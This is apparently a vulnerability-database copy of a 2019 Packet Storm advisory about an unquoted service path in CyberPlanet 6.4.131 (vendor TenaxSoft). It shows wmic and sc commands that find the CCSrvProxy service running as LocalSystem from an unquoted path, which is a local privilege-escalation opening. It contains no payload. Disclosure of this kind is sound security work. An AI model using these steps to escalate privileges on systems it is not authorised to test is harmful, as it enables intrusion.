Lucene search
K

TexasSoft CyberPlanet 6.4.131 Unquoted Service Path

🗓️ 28 Nov 2019 00:00:00Reported by Cristian Ayala GType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 194 Views

TexasSoft CyberPlanet 6.4.131 unquoted service path on Windows 10 Pro x6

Code
`# Exploit Title: TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path  
# Date: 2019-11-28  
# Exploit Author: Cristian Ayala G  
# Vendor Homepage: https://tenaxsoft.com/index.html  
# Software Link: https://tenaxsoft.com/descargas.html  
# Version: 6.4.131  
# Tested on: Windows 10 Pro x64  
  
##########################################################################  
  
# Step to discover the unquoted Service:  
  
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr -i "auto" | findstr -i -v "C:\Windows\\ | findstr """  
CCSrvProxy CCSrvProxy C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe Auto  
Control de impresiones Tenax ControldeImpresiones C:\Program Files (x86)\TenaxSoft\CyberPlanet\TenaxService64.exe Auto  
  
##########################################################################  
  
# Service info:  
  
C:\Users\user>sc qc CCSrvProxy  
[SC] QueryServiceConfig CORRECTO  
  
NOMBRE_SERVICIO: CCSrvProxy  
TIPO : 10 WIN32_OWN_PROCESS  
TIPO_INICIO : 2 AUTO_START  
CONTROL_ERROR : 1 NORMAL  
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe  
GRUPO_ORDEN_CARGA :  
ETIQUETA : 0  
NOMBRE_MOSTRAR : CCSrvProxy  
DEPENDENCIAS : Spooler  
NOMBRE_INICIO_SERVICIO: LocalSystem  
  
##########################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation